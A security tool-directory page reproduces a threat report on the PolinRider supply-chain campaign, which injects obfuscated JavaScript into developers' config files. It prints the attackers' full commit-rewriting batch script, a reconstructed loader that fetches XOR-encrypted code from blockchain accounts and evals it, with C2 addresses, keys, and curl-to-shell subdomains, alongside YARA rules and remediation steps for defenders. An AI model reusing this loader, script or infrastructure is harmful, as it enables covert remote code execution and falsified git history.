Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
PolinRider — Technical dossier on the DPRK-linked PolinRider supply-chain attack, documenting obfuscated JS payload injection, git history manipulation, C2 infrastructure, and remediation guidance for 1,951 compromised repositories. | Kitploit
Tools/GitHubGitHub/opensourcemalware/polinrider
Indicator of Compromise (IOC) ManagementOSINT (Open Source Intelligence)Vulnerability AnalysisCode AnalysisForensicsMalware AnalysisThreat IntelligenceSupply Chain SecurityLearning & Education

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
Incident Response
Curated Resources
GitHubopensourcemalware/polinrider

PolinRider

Technical dossier on the DPRK-linked PolinRider supply-chain attack, documenting obfuscated JS payload injection, git history manipulation, C2 infrastructure, and remediation guidance for 1,951 compromised repositories.

View Repository
7881 month agoReviewed by Kitploit

PolinRider: DPRK Threat Actor Implants Malware in Hundreds of GitHub Repos

PolinRider Threat Campaign

  • Date: 2026-03-07
  • Last updated: 2026-04-11 — see April 10–11 Update below
  • Severity: CRITICAL — active supply chain infection across 1,950+ public repositories, confirmed operational merger with the TasksJacker / Contagious Interview cluster

The OpenSourceMalware team has uncovered a massive threat campaign that is implanting malware in GitHub users and organizations repositories. The threat actor, PolinRider, has implanted a malicious obfuscated JavaScript payloads in hundreds public GitHub repositories belonging to hundreds unique owners. Use the #polinrider to see all threat reports related to this campaign, and jump to the end of this blog for the list of compromised repositories, including ones we recommend prioritising for immediation action. Keep in mind that the tag is the best way to get current data.

The JavaScript payload is appended to the end of real project config files — silently, after the file's legitimate content — making it easy to miss during casual code review. The primary infection vector appears to be a compromised npm package that executes during install or build and injects itself into config files in the project root. Even worse, this threat actor has used the same technique to craft malicious NPM packages as well.

This attack has been enormously successful, with one compromised open source project, Neutralinojs spreading the malware to hundreds of its users and contributors. Neutralinojs is a very popular project with 8400 stars, 495 forks, and dozens of active contributors. This is the power of this type of attack, as the threat isn't limited to just the initial GitHub repositories, but extends to all the other projects that use that open source.

The OpenSourceMalware team has attributed this campaign to the DPRK, and the threat actor PolinRider is a known Lazarus group contributor with connections to "Contagious Interview" and "TasksJacker" campaigns.

Impact Statistics

This campaign has grown dramatically since first publication. As of 2026-04-11, the OSM team has confirmed 1,951 public GitHub repositories belonging to 1,047 unique owners are compromised. This is a 2.9× increase in the five weeks since the original publish date (Mar 8: 675 repos / 352 owners).

GitHub Repos Compromised


April 10–11 Update

In a follow-up hunt started 2026-04-10 and continued into 2026-04-11, the OSM team made several major findings:

  1. The campaign has more than doubled in 5 weeks. Cross-engine enumeration via GitHub Code Search and Sourcegraph (with refinement past the API's 1000-result cap — see methodology below) surfaced 1,556 unique compromised repos in our v3 master on day one. A round-2 hunt on day two added another 215 new repos via npm-package-name pivots, VS Code tasks.json / cloud-provider pivots, and the newly-discovered default-configuration.vercel.app C2 subdomain. After deduping against the existing affected_repos.csv corpus, the true known scope is now 1,951 unique victim repos / 1,047 unique owners.

  2. A new variant has been observed. PolinRider has rotated all unique fingerprints of its obfuscator while preserving the architecture. The new variant uses signature marker Cot%3t=shtP (was rmcej%otb%), shuffle seed 1111436 (was 2857687), secondary seed 3896884 (was 2667686), and decoder function name MDy (was _$_1e42). This rotation appears to be an evasion response to the published . Both variants are currently active in the wild. See below.

The full v3 + round 2 hunt reports and master TSVs are in reports/.


GitHub Attack Details

The threat actor is not using stolen GitHub credentials. Instead, the vicims have been compromised via a malicious VS Code extension or NPM package. We don't know yet what that initial vector is, but we know what it does from the forensic evidence.

The first thing that happens is the malware executes a search function on the local computer that looks for certain files like:

  • postcss.config.mjs
  • tailwind.config.js
  • eslint.config.mjs
  • next.config.mjs
  • babel.config.js
  • App.js
  • app.js

If it finds one of those files it will append heavily obfuscated malicious JavaScript code to the end of that file. Next, the malware installs a Windows batch file, named temp_auto_push.bat. We know this file exists and what it does because the threat actors have left it on hundreds of compromised servers which gives researchers a fingerprint to search for. Here's the batch file in its entirety:

root@kitploit:~
@echo off
for /f "delims=" %%A in ('cmd /c "git log -1 --date=format-local:%%Y-%%m-%%d --format=%%cd"') do set LAST_COMMIT_DATE=%%A
for /f "delims=" %%A in ('cmd /c "git log -1 --date=format-local:%%H:%%M:%%S --format=%%cd"') do set LAST_COMMIT_TIME=%%A
for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%s"') do set LAST_COMMIT_TEXT=%%A
for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%an"') do set USER_NAME=%%A
for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%ae"') do set USER_EMAIL=%%A
for /f "delims=" %%A in ('git rev-parse --abbrev-ref HEAD') do set CURRENT_BRANCH=%%A
echo %LAST_COMMIT_DATE% %LAST_COMMIT_TIME%
echo %LAST_COMMIT_TEXT%
echo %USER_NAME% (%USER_EMAIL%)
echo Branch: %CURRENT_BRANCH%
set CURRENT_DATE=%date%
set CURRENT_TIME=%time%
date %LAST_COMMIT_DATE%
time %LAST_COMMIT_TIME%
echo Date temporarily changed to %LAST_COMMIT_DATE% %LAST_COMMIT_TIME%
git config --local user.name %USER_NAME%
git config --local user.email %USER_EMAIL%
git add .
git commit --amend -m "%LAST_COMMIT_TEXT%" --no-verify
date %CURRENT_DATE%
time %CURRENT_TIME%
echo Date restored to %CURRENT_DATE% %CURRENT_TIME% and complete amend last commit!
git push -uf origin %CURRENT_BRANCH% --no-verify
@echo on

Batch File Analysis

This batch file rewrites the most recent git commit while preserving its original timestamp — effectively making an amended commit look like it was never touched.

Phase 1: Extract Last Commit Metadata

It runs git log -1 five times to pull the last commit's details into environment variables:

Phase 2: Display Extracted Info

Echoes those values to the console so you can see what was captured before proceeding.

Phase 3: The Timestamp Trick (Core Manipulation)

  1. Saves the current system date and time to variables
  2. Changes the Windows system clock to match the last commit's date and time
  3. Sets the local git user.name and user.email to match the original commit's author

Phase 4: Amend the Commit

root@kitploit:~
git add .
git commit --amend -m "%LAST_COMMIT_TEXT%" --no-verify

Because the system clock was rewound, git records the amended commit with the original timestamp, making it appear unmodified in history. --no-verify bypasses any pre-commit hooks.

Phase 5: Restore and Push

  1. Restores the system clock to the real current date/time
  2. Force-pushes to the remote branch with -uf and --no-verify to bypass push hooks

In Plain Terms

This script lets you silently modify the last commit (adding or changing files) while making the rewritten commit appear to have the same author, timestamp, and message as before. To any observer looking at git history, it looks like the commit was never amended.

Notable Characteristics

  • Requires elevated privileges to change the Windows system clock
  • Force push (-uf) will overwrite remote history — destructive to anyone else on the branch
  • Both --no-verify flags intentionally bypass any CI/CD hooks or lint checks
  • It is essentially a history-falsification tool — useful for legitimate cleanup, but equally useful for covering tracks

What about Linux and MacOS?

We assume the malware has similar functions to rewrite git history for other operating systems like Linux and MacOS. In fact, we've seen evidence its happening on other OSes, but the threat actors have not left tools that work on those other platforms in the source code like they have for Windows.


Recommended Actions

For affected repo owners:

  1. Audit all JS config files (postcss.config.*, tailwind.config.*, eslint.config.*, next.config.*, vite.config.*, webpack.config.js, gridsome.config.js, vue.config.js, etc.) for content appearing after export default or module.exports. Also check non-default branches and nested monorepo paths (apps/*/, frontend/, client/, web/, etc.) — many victims are infected only in deep paths.

For security tooling / registries:

  • Add the multi-variant polinrider_payload YARA rule (below) to static analysis pipelines — covers both rmcej%otb% and Cot%3t=shtP variants.
  • Flag packages with postinstall scripts that write to project root config files.
  • Cross-reference affected repo owners against recently published npm packages, especially in the Tailwind / PostCSS ecosystem.
  • Add filename:temp_auto_push.bat and LAST_COMMIT_DATE LAST_COMMIT_TIME extension:bat as continuous monitoring queries on GitHub Code Search.

Check for PolinRider with OSM script

Our team has written a bash script that will check your local system for compromise. At the end of this blog post you can find out more, or you can checkout the script here


Infected File Types

The April 10 update significantly expanded the file-type list. The malware targets a wider set of JS-family files than originally documented, and has been observed inside binary assets like .woff2 font files. Counts below reflect the 2026-04-10 corpus of 1,736 unique repos.

The dominance of postcss.config.mjs (~62% of repos in both data points) continues to point at the PostCSS / Tailwind ecosystem as the primary infection vector. The newly observed entries — vite.config.*, webpack.config.js, gridsome.config.js, vue.config.js, truffle.js, and binary .woff2 files — show the malware has expanded its file-targeting heuristics or that the threat actor is using multiple npm-package vehicles to reach victims using different build tooling.

The propagation-script artifact temp_auto_push.bat has been left behind in 101 victim repos, even in cases where the JS payload has since been cleaned up by the owner. This file is one of the highest-confidence indicators of past compromise.


Malicious NPM Packages

tailwind-mainanimation NPM Package

The threat actor has published several malicious NPM packages, all impersonating Tailwind / PostCSS adjacent utilities. As of 2026-04-11, the allavin and blackedward npm accounts have both been deleted from npm and their packages scrubbed, but the existing victim repos still carry the dependency references and (in many cases) still have the post-install-injected malware in their config files.

The April 11 hunt confirmed that tailwindcss-style-animate ^1.1.6 is the primary malicious dependency of the ShoeVista fake-interview template — 34 of the 46 npm-package-pivot hits are developer reuploads of that template with that exact dependency. The other packages in the list are used by sibling campaigns (e.g. tailwind-autoanimation in the devhire-frontend cluster and reactapp-6).

Investigators looking to pivot via the npm dependents tree should note that this pivot is no longer viable for tailwind-mainanimation — npm has scrubbed the live malicious release. Pivot instead via "<package_name>" filename:package.json GitHub Code Search queries, which still return the ghost references in victim repos.

NPM Packages

The tailwind-autoanimation package uses the same exact technique of appending the malicious JavaScript payload onto the end of the entrypoint file src/index.js:

NPM Payload


Malware Summary

PolinRider delivers a multi-stage payload, that culminates in a new version of the DPRK Beavertail malware. The initial payload is a mass-compromise backdoor/infostealer that injects an obfuscated JavaScript payload into legitimate developers' repositories. The payload is appended after whitespace padding to common config files (postcss.config.mjs, eslint.config.mjs, tailwind.config.js, etc.) so it executes automatically when build tools import the module. It uses a multi-layer string shuffling deobfuscation routine, ultimately constructing and eval'ing the final payload at runtime.

The OSM team has so far observed two active variants of this obfuscator with rotated unique fingerprints:

  • Original variant (Mar 8 publication): signature ("rmcej%otb%",2857687), decoder function _$_1e42, secondary seed 2667686, injection marker global['!'].
  • New variant (Apr 10 update): signature Cot%3t=shtP, shuffle seed 1111436, decoder function MDy, secondary seed 3896884, injection marker global['_V']='8-XXX'. Same architecture, all unique constants rotated — almost certainly an evasion response to the published rmcej_otb_payload YARA rule.

Both variants use the same blockchain dead-drop C2 infrastructure (TRON / Aptos / BSC) with the same XOR keys, and both are currently active in the wild.

This final payload is a sophisticated blockchain-based dead drop resolver that uses immutable blockchain transactions as Command & Control (C2) infrastructure. The malware fetches encrypted JavaScript payloads from blockchain accounts (TRON, Aptos, and BSC), decrypts them using XOR encryption, and executes them via eval(). This technique makes the C2 infrastructure virtually impossible to take down since blockchain data is immutable.


What Does It Do?

Primary Functionality

  1. Blockchain-Based C2 Communication

    • Queries TRON blockchain accounts for transaction data
    • Falls back to Aptos blockchain if TRON fails
    • Can query Binance Smart Chain (BSC) transactions
    • Retrieves encrypted JavaScript payloads from blockchain transactions
  2. Payload Decryption

    • Uses XOR cipher with hardcoded keys to decrypt payloads
    • Two different XOR keys for different stages/fallbacks
  3. Remote Code Execution

    • Executes decrypted code via eval()
    • Spawns detached child processes for persistence
    • Code execution happens with no user interaction
  4. Anti-Analysis Features

    • Multiple layers of obfuscation (4+ layers)
    • String encryption and character substitution
    • Dead drop resolver technique (hard to attribute)
    • Detached process execution (survives parent termination)

Malware Technical Analysis

The OSM team described the complete attack chain for this malware in our blog on the recent Neutralinojs compromise.

Obfuscation Layers

The malware uses four layers of obfuscation:

Layer 1: Character swap algorithm with seed 2857687

  • Deobfuscates to array: ['r', 'object', 'm'] (require, typeof check, module)

Layer 2: Character swap with seed 2667686

  • Deobfuscates function names and string constants
  • Reveals the decoder function code

Layer 3: Custom substitution cipher

  • Character mapping using special codes
  • Replaces placeholders like .c, .a, etc. with actual characters
  • Character codes: \, `, space, newline, *, ', and more

Layer 4: XOR encryption for final payloads

  • Payloads retrieved from blockchain are XOR-encrypted
  • Two hardcoded keys for different stages

New Variant: Cot%3t=shtP

In April 2026 the OSM team identified a second active variant of the PolinRider obfuscator. The architecture is identical to the original — same 4-layer shuffle-cipher, same blockchain dead-drop C2, same multi-stage Beavertail second-stage — but every unique fingerprint string has been rotated, almost certainly in response to the published rmcej_otb_payload YARA rule.

The new variant uses an additional injection marker line: global['_V']='8-XXX' (where 8-XXX is a per-injection version tag, e.g. 8-st1, 8-st2, …, 8-st59, plus a parallel numeric batch like 8-413, 8-683, 8-778, 8-974). The sequential '8-stN' tags are the OSM team's strongest evidence that the threat actor's tooling assigns a numeric ID per victim and that at least 59 sequential injections of this variant exist (some not yet indexed by public code search).

Notable cross-variant finding

At least one repository — HassanHabibTahir/testclient — contains markers from BOTH variants in different files (rmcej%otb% in postcss.config.mjs and global['_V'] in another file), indicating the threat actor's tooling is re-running against previously-compromised hosts with the rotated obfuscator. Defenders should not assume that a once-cleaned repo remains clean.

Weaponized Take-Home Templates

In addition to the npm-package and .vscode/tasks.json delivery vectors, the PolinRider threat actor has authored at least two fake take-home test projects distributed to candidates via fake job-interview lures (the classic Contagious Interview playbook). These project templates ship pre-loaded with malicious dependencies or tasks.json payloads so that simply cloning and running the project triggers the infection.

ShoeVista (Tailwind e-commerce template)

  • Template name: ShoeVista (also seen as shoevista, shoe-vista, Test-west-shoe, Test-002, product-catalog, mern-app, various candidate-named forks)
  • Stack: React frontend in client/, Node/Express backend in server/ (typical MERN take-home)
  • Delivery vector: Malicious npm dependency "tailwindcss-style-animate": "^1.1.6" in client/package.json
  • Package.json name field: "client" (generic — the ShoeVista branding is in the README / fake-company landing page)

StakingGame (VS Code + blockchain automation template)

  • Template fingerprint: the tasks.json file contains "projectInfo": { "name": "StakingGame", "description": "Advanced VSCode automation for multi-environment blockchain deployment.", "uuid": "e9b53a7c-2342-4b15-b02d-bd8b8f6a03f9" } — the UUID is constant across all victims and is the strongest indicator of this template
  • Delivery vector: Weaponized .vscode/tasks.json with runOn: folderOpen executing curl | bash against default-configuration.vercel.app and the other newly-discovered Vercel C2 subdomains
  • Observed victim repos: 42+ direct UUID matches plus broader tasks.json usage. Examples: Devba/lmng-top-, wyrustaaruz/cal-eco-platform
  • Theme: positioned as a blockchain / staking-game developer assessment; appeals to Web3 candidates

Implications

The existence of pre-weaponized template projects means:

  • Developers finishing "take-home tests" from unvetted recruiters are a primary infection vector. This isn't just a supply-chain attack on npm; it's a social-engineering attack on the job market.
  • The victim accounts are not previously-compromised developers. They are fresh candidate accounts created specifically to complete a test. This explains the large number of 0-star / 0-fork victim repos with account ages < 1 year.
  • Defenders hunting for victims should include candidate-naming patterns (test-*, *-test, *-interview, *-assessment, *-task) in their search heuristics.

Execution Flow

root@kitploit:~
1. Malware loads when NPM package is imported or the source code is run by Node
2. Deobfuscates internal strings and function names
3. Queries TRON blockchain account for latest transaction
   ├─ URL: https://api.trongrid.io/v1/accounts/TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP/transactions
   └─ Extracts transaction data containing encrypted payload
4. If TRON fails, queries Aptos blockchain
   ├─ URL: https://fullnode.mainnet.aptoslabs.com/v1/accounts/0xbe037.../transactions
   └─ Extracts payload from transaction arguments
5. XOR-decrypts the payload using key "2[gWfGj;<:-93Z^C"
6. Executes decrypted code via eval()
7. Spawns detached child process for persistence
   ├─ Command: node -e "<malicious code>"
   └─ Detached: true, windowsHide: true
8. If first set fails, repeats with secondary addresses and key

Code Structure

root@kitploit:~
// Simplified structure (actual code is heavily obfuscated)

async function fetchPayloadFromTron(address) {
    // Queries TRON API for account transactions
    const response = await https.get(
        `https://api.trongrid.io/v1/accounts/${address}/transactions?only_confirmed=true&only_from=true&limit=1`
    );
    // Extracts encrypted data from transaction
    return response.data[0].raw_data.data;
}

async function fetchPayloadFromAptos(txHash) {
    // Queries Aptos API for transaction details
    const response = await https.get(
        `https://fullnode.mainnet.aptoslabs.com/v1/accounts/${txHash}/transactions?limit=1`
    );
    // Extracts payload from transaction arguments
    return response[0].payload.arguments[0];
}

function xorDecrypt(encryptedData, key) {
    // XOR decryption with repeating key
    let result = '';
    for (let i = 0; i < encryptedData.length; i++) {
        const keyChar = key.charCodeAt(i % key.length);
        result += String.fromCharCode(encryptedData.charCodeAt(i) ^ keyChar);
    }
    return result;
}

// Main execution
const encryptedPayload = await fetchPayloadFromTron("TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP");
const decryptedCode = xorDecrypt(encryptedPayload, "2[gWfGj;<:-93Z^C");
eval(decryptedCode);  // EXECUTES ARBITRARY CODE

// Persistence via detached child process
require('child_process').spawn('node', ['-e', `global['_V']='...'${decryptedCode}`], {
    detached: true,
    stdio: 'ignore',
    windowsHide: true
});

C2 Infrastructure (Indicators of Compromise)

Vercel-hosted HTTP C2 endpoints (TasksJacker-side vector)

Used in .vscode/tasks.json curl | bash payloads with runOn: folderOpen. All follow the URL shape https://<sub>.vercel.app/settings/(mac|linux|win)?flag=<N>. These are the attacker-controlled bootstrap servers that deliver the PolinRider JS loader to VS Code victims.

All five of the vscode-* / default-configuration domains were discovered in the April 10–11 hunt and are now part of the OSM hunting query set. Expect more sibling subdomains as Vercel domains are cheap / disposable to the threat actor.

Blockchain Addresses (PolinRider-JS-loader second-stage dead-drop)

TRON Addresses (Primary C2)

  • TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP (Primary)
  • TXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG (Secondary)

API Endpoint: https://api.trongrid.io/v1/accounts/

Aptos Transaction Hashes (Fallback C2)

  • 0xbe037400670fbf1c32364f762975908dc43eeb38759263e7dfcdabc76380811e (Primary)
  • 0x3f0e5781d0855fb460661ac63257376db1941b2bb522499e4757ecb3ebd5dce3 (Secondary)

API Endpoint: https://fullnode.mainnet.aptoslabs.com/v1/accounts/

BSC RPC Nodes

  • bsc-dataseed.binance.org
  • bsc-rpc.publicnode.com

Method: eth_getTransactionByHash

XOR Decryption Keys

  • Primary Key: 2[gWfGj;<:-93Z^C
  • Secondary Key: m6:tTh^D)cBz?NM]

StakingGame template UUID

  • e9b53a7c-2342-4b15-b02d-bd8b8f6a03f9 — appears in the projectInfo.uuid field of the malicious .vscode/tasks.json for the StakingGame fake-interview template. Highly specific; 0 false positives in testing.

YARA Rule (Suggested) — covers both variants

The original rmcej_otb_payload rule (still valid for the original variant) has been superseded by a multi-variant rule that catches both the original rmcej%otb% strain and the rotated Cot%3t=shtP strain. Use this in static analysis pipelines.

root@kitploit:~
rule polinrider_payload {
    meta:
        description = "Detects PolinRider shuffle-cipher JS payloads — both rmcej%otb% (v1) and Cot%3t=shtP (v2) variants"
        author = "OpenSourceMalware.com"
        date = "2026-04-10"
        severity = "high"

    strings:
        // Original variant (rmcej%otb%)
        $marker_v1   = "rmcej%otb%"
        $seed1_v1    = "2857687"
        $seed2_v1    = "2667686"
        $varname_v1  = "_$_1e42"
        $global_bang = "global['!']"

        // New variant (Cot%3t=shtP)
        $marker_v2   = "Cot%3t=shtP"
        $seed1_v2    = "1111436"
        $seed2_v2    = "3896884"
        $varname_v2  = "MDy"
        $global_V    = "global['_V']"

        // Common across variants
        $global_r    = "global['r'] = require"
        $global_m    = "global['m'] = module"

    condition:
        any of ($marker_*) or
        ($global_bang and ($seed1_v1 or $varname_v1)) or
        ($global_V    and ($seed1_v2 or $varname_v2)) or
        ($global_r and $global_m and (any of ($seed1_*)))
}

YARA Rule (Legacy) — original variant only

root@kitploit:~
rule rmcej_otb_payload {
    meta:
        description = "Detects rmcej%otb% shuffle-cipher JS payload injected into config files (original variant only)"
        author = "OpenSourceMalware.com"
        date = "2026-03-07"
        severity = "high"

    strings:
        $marker   = "rmcej%otb%"
        $global   = "global['!']"
        $seed1    = "2857687"
        $seed2    = "2667686"
        $varname  = "_$_1e42"

    condition:
        $marker or ($global and $seed1) or ($varname and $seed2)
}

Data Collection (Mar 8 — original method)

Data was collected using the GitHub Code Search API via gh search code, running one query per infected filename to work around the 1,000-result-per-query cap. Results were deduplicated by repository full name.

Refinement Methodology (Apr 10 — expanded method)

The April 10 hunt expanded the data collection by combining five orthogonal pivots and applying a partition-by-extension/size/fork strategy to push past GitHub Code Search's 1,000-result-per-query cap on the most powerful pivot.

Pivots used in the April 10–11 hunt

Pushing past the 1,000-result cap

The _$_1e42 decoder-function-name query reported total_count: 968 and capped at 1,000 returned items, but the GitHub web UI showed 1,400+ matches. Refining into orthogonal sub-queries that each stay under 1,000 results, then taking the union, broke the cap:

Three crucial findings from this exercise:

  1. The single biggest hidden gap was forks. GitHub Code Search excludes forks by default (fork:false). Adding fork:true revealed 157 fork repos containing the marker that were completely invisible to the original query.
  2. Sub-bucketing the size:5000..10000 range by 1KB slices yielded 986 results vs. the bucket's reported 968 — even within a sub-1000 reported total, the cap can hide entries. The right approach is recursive bucketing until each bucket is well under the cap.
  3. extension: splits yield more total results than language: splits because GitHub's language detection sometimes excludes .mjs and .cjs from the JavaScript bucket.

Cross-engine union (true scope)

Combining the April 10–11 hunt data with the existing affected_repos.csv yields the true currently-known corpus:

Sample-verified false positive rate

Across 44 random samples taken across both rounds of the hunt, 0 false positives were observed. Every sampled repo contained at least one of the PolinRider invariants (rmcej%otb%, Cot%3t=shtP, _$_1e42, MDy, global['!'], global['_V'], LAST_COMMIT_DATE inside a propagation .bat, a known malicious npm package in package.json, or a .vscode/tasks.json with a curl | bash to one of the known C2 subdomains) in the file at the indexed pivot path.

Round 2 specifically introduced two new variant classifications in the submission taxonomy:

  • malicious_npm: the repo contains one of the 7 known malicious npm packages in a package.json (45 submissions — almost all ShoeVista template reuploads).
  • tasksjacker: the repo contains a .vscode/tasks.json with a runOn: folderOpen task executing curl | bash or wget | sh against a Vercel/Render/Railway C2 subdomain (27 submissions — includes the StakingGame template cluster).

Files


Compromised Repositories

All compromised repositories can be found through the OpenSourceMalware tag #polinrider.

Outreach Prioritisation

The full CSVs are sorted by impact for triage.

Top Repos by Stars + Forks

Top Organisations by Followers

Top Individual Users by Followers

Priority targets: sparktechagency (130 followers, 12 repos) and FSDTeam-SAA (21 followers, 12 repos) are the highest-volume orgs. Among individuals, coderkhalide (349 followers) has the widest direct reach.


All Compromised Repositories as of March 8, 2026


Read more

Download Tool
MetricMar 8 (initial)Apr 11 (latest)Δ
Unique repositories infected6751,951+1,276
Unique owners affected3521,047+695
— Individual users305~930+625
— Organisations47~117+70
Distinct obfuscator variants observed1 (rmcej%otb%)2 (rmcej%otb% + Cot%3t=shtP)+1
Distinct injection vectors confirmed1 (config file)4 (config file, .vscode/tasks.json, fake .woff2 font, malicious npm dep)+3
Distinct C2 subdomains documented1 (260120.vercel.app)6+ (see C2 Infrastructure)+5
Known weaponized take-home templates02+ (ShoeVista, StakingGame)+2
rmcej_otb_payload YARA rule
New Variant: Cot%3t=shtP
  • The threat actor is re-infecting earlier victims. At least one victim repo (HassanHabibTahir/testclient) contains markers from BOTH variants in different files, indicating the actor's tooling is re-running against previously-compromised hosts and injecting the new obfuscator.

  • PolinRider and TasksJacker have operationally merged. We now have direct evidence that the same threat actor is running both the config-file injection and the .vscode/tasks.json curl-to-shell infection vector against the same victim population. 22 of the 101 temp_auto_push.bat propagation-script victims also have malicious .vscode/tasks.json files, and multiple weaponized take-home / fake-interview template projects have been identified — see Weaponized Take-Home Templates below. OSM is consolidating the two clusters under #polinrider going forward.

  • Two weaponized take-home test projects identified: ShoeVista (a fake Tailwind e-commerce assessment that ships with malicious tailwindcss-style-animate ^1.1.6 in client/package.json) and StakingGame (a fake blockchain / VS Code automation project identified by the UUID e9b53a7c-2342-4b15-b02d-bd8b8f6a03f9 in tasks.json). At least 46 + 42 developers attempted these tests and were compromised. Part of the Contagious Interview lure playbook.

  • Five new C2 subdomains discovered that are being used in .vscode/tasks.json curl | bash payloads, all hosted on Vercel:

    • default-configuration.vercel.app (most-used, ~106 victim references)
    • vscode-settings-bootstrap.vercel.app
    • vscode-settings-config.vercel.app
    • vscode-bootstrapper.vercel.app
    • vscode-load-config.vercel.app

    All follow the pattern https://<sub>.vercel.app/settings/(mac|linux|win)?flag=<N>. Added to the C2 Infrastructure section.

  • OSM submitted 821 new threat reports across this two-day hunt, bringing total OSM PolinRider entries to ~1,700. Variant breakdown of the 821 submissions: 591 original variant (rmcej%otb%), 113 propagation-only (temp_auto_push.bat), 45 malicious_npm (ShoeVista/devhire cluster), 27 tasksjacker, 1 new variant (Cot%3t=shtP), 44 other.

  • New high-yield search pivots were identified that find victims even when the JS payload has been cleaned up. The strongest are filename:temp_auto_push.bat (101 confirmed-malicious results, 100% true-positive rate) and "default-configuration.vercel.app" (106 hits). Sample false-positive rate across 44 random verifications was 0%. See Refinement Methodology below.

  • A new injection vector was confirmed: at least one victim (AgbaD/odoo) has the obfuscated JS payload hidden in a .woff2 font file (public/fonts/fa-solid-400.woff2) that gets executed via Node — confirming the campaign uses multiple injection vectors against the same target.

  • No third obfuscator variant found. Exhaustive probing of global['?'] markers, seed combinations, structural patterns, IOC literals, and sequential '8-stN' tags 1–200 (via Sourcegraph regex) produced no evidence of a third variant beyond the two already documented. The actor's new-variant batch is capped at 8-st1..8-st59 (with 21 sequential numbers missing from Sourcegraph's index).

  • VariableValue captured
    LAST_COMMIT_DATEDate of last commit (YYYY-MM-DD)
    LAST_COMMIT_TIMETime of last commit (HH:MM:SS)
    LAST_COMMIT_TEXTCommit message
    USER_NAMEAuthor name
    USER_EMAILAuthor email
    CURRENT_BRANCHCurrent branch name
  • Look for the propagation-script artifact temp_auto_push.bat at the repo root and any config.bat referenced from .gitignore. Even if the obfuscated JS payload has been cleaned up, this file is direct evidence of past compromise and should trigger a credential rotation.
  • Audit binary assets in public/, static/, assets/ for unexpected .woff / .woff2 files — the malware has been observed hiding payloads inside fake font files (the "fake-font" sub-variant).
  • Review package.json dependencies — particularly any recently added or updated PostCSS/Tailwind-related packages such as tailwind-mainanimation, tailwind-autoanimation, and the other npm packages listed below.
  • Check node_modules for postinstall scripts: grep -r "postinstall" node_modules/*/package.json
  • Rotate any secrets, tokens, or credentials that may have been present in the environment during a build.
  • Force-push clean config files and consider signing commits going forward.
  • Do not assume a previously-cleaned repo remains clean — the OSM team has observed at least one victim that was re-infected with the rotated Cot%3t=shtP variant after a prior cleanup of the rmcej%otb% variant. Re-scan periodically.
  • FileOccurrences (Mar 8)Occurrences (Apr 10)
    postcss.config.mjs416~960
    tailwind.config.js84~210
    eslint.config.mjs60~150
    postcss.config.js13~40
    App.js13~30
    next.config.mjs12~30
    index.js6~25
    astro.config.mjs6~15
    tailwind.config.mjs5~12
    vite.config.js / vite.config.mjs—~20
    webpack.config.js—~15
    gridsome.config.js—~5
    vue.config.js—~10
    truffle.js—~5
    temp_auto_push.bat (propagation script artifact)—101
    .woff2 font files (fake-font sub-variant)—observed
    PackageLatest versionStatusPublisherObserved victim count (Apr 11)
    tailwindcss-style-animate1.1.6observed(account deleted)34 ← primary ShoeVista dep
    tailwind-mainanimation2.3.3 → 0.0.1-securityTAKEN DOWN by npm (replaced by security placeholder 2026-03-13)allavin (account deleted)1
    tailwind-autoanimation2.3.6REMOVED from registryblackedward (account deleted)2
    tailwind-animationbased—observed(account deleted)0
    tailwindcss-typography-style0.8.2observed(account deleted)6
    tailwindcss-style-modify0.8.3observed(account deleted)4
    tailwindcss-animate-style1.2.5observed(account deleted)0
    AttributeOriginal variantNew variant
    Signature markerrmcej%otb%Cot%3t=shtP
    Shuffle seed (layer 1)28576871111436
    Secondary seed (layer 2)26676863896884
    Decoder function name_$_1e42MDy
    Globals injectedglobal['!'], global['r'], global['m']global['_V'], global['r'], global['m']
    Targeted file typespostcss.config.mjs, tailwind.config.js, eslint.config.mjs, etc.(same)
    Injection styleAppended after legitimate export default / module body(same)
    Blockchain C2TRON / Aptos / BSC(same — addresses unchanged)
    XOR keysunchangedunchanged
  • Observed victim repos: 34+ individual developer reuploads, all created Feb–Mar 2026, all 0 stars / 0 forks (fresh throwaway accounts). Examples: alaminrifat/shoevista-rifat, Atik203/ShoeVista, DaviBarros/shoevista, IchaCoder/test-shoe, Anas-Ali-3673/Test-west-shoe, naime7132/client-2 (devhire variant)
  • Naming pattern: candidates often name the repo after the fake-company prompt (ShoeVista, shoevista-rifat, HedaetShahriar/ShoeVista-Test) or after the interview platform (Test-002, test-shoe, test_upwork, test_west_shoe)
  • SubdomainCount (Apr 11)First observedNotes
    260120.vercel.app56pre-Mar 8Original OSM query Q11; also published in the first blog
    default-configuration.vercel.app106Apr 2026Largest single-subdomain cluster found so far
    vscode-settings-bootstrap.vercel.app16Apr 2026
    vscode-settings-config.vercel.app11Apr 2026
    vscode-bootstrapper.vercel.app6Apr 2026
    vscode-load-config.vercel.app6Apr 2026
    Filename searchedResults
    postcss.config.mjs416
    tailwind.config.js84
    eslint.config.mjs60
    App.js13
    postcss.config.js13
    next.config.mjs12
    index.js6
    astro.config.mjs6
    Other config files81
    Total (pre-dedup)700
    Unique repos675
    #PivotEngineUnique repos contributed
    1filename:temp_auto_push.batGitHub Code Search101
    2"_$_1e42" (with extension/size/fork refinement)GitHub Code Search1,323
    3"function MDy(f)" global _VGitHub Code Search14
    4LAST_COMMIT_DATE LAST_COMMIT_TIME extension:batGitHub Code Search236
    5Cot%3t=shtP regex with fork:yes archived:yesSourcegraph41
    Round 1 combined1,556
    6"<malicious_npm_package>" filename:package.json (7 npm packages)GitHub Code Search46
    7<url> filename:tasks.json (vercel.app, onrender.com, 260120.vercel.app)GitHub Code Search145
    8"default-configuration.vercel.app" and 4 sibling vscode-*.vercel.app subdomainsGitHub Code Search94
